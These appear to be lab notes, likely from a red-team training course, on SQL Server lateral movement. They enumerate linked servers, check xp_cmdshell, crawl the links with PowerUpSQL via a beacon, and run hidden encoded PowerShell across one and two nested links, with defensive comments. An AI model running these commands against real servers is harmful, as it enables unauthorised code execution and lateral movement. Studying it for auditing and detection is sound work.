Lateral Movement

-- List the linked servers defined on the current instance. master..sysservers
-- is the legacy compatibility view; sys.servers is the current catalog view.
-- Every row is a trust path out of this instance, so unused links are worth
-- removing.
SELECT srv.*
FROM master..sysservers AS srv;

-- Send a pass-through query over the link. The remote server's name coming
-- back confirms that the current login can use the link. The inner statement
-- runs on the remote side under whichever login the link maps to (the mapping
-- is not shown here; check it when auditing).
SELECT link_result.*
FROM OPENQUERY(
    "sql-1.cyberbotic.io",
    'select @@servername'
) AS link_result;

-- Read the xp_cmdshell row of sys.configurations on the remote server.
-- value_in_use = 1 means OS command execution is enabled there. Hardened
-- instances keep it at 0 and alert on changes to this setting.
SELECT remote_cfg.*
FROM OPENQUERY(
    "sql-1.cyberbotic.io",
    'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell'''
) AS remote_cfg;

# Get-SQLServerLinkCrawl is a PowerUpSQL function that follows linked-server
# definitions outward from the given instance. A DBA can run the same crawl to
# map the link topology and find chains that reach further than intended.
beacon> powershell Get-SQLServerLinkCrawl -Instance "srv-1.dev.cyberbotic.io,1433"

-- Pass-through batch over the link that ends in xp_cmdshell on the remote
-- server ('blah' is the page's placeholder for the encoded PowerShell argument).
-- It only works if xp_cmdshell is enabled remotely and the link's mapped login
-- may call it. The OS command then runs as the SQL Server service account, or
-- as the proxy account for non-sysadmin callers.
-- Defensive view: keep xp_cmdshell disabled, map links to low-privileged
-- logins, and alert on sqlservr.exe spawning cmd.exe/powershell.exe,
-- especially with -enc or -w hidden on the command line.
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')

-- Same batch one hop further: the OPENQUERY sent to sql-1.cyberbotic.io itself
-- calls OPENQUERY against sql01.zeropointsecurity.local. Single quotes are
-- doubled once per nesting level.
-- NOTE(review): the host names suggest the second hop is in a different domain;
-- confirm. Link trust is transitive, so an audit must follow whole chains and
-- check the mapped login at every hop, not only the links defined locally.
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select * from openquery("sql01.zeropointsecurity.local", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')') 
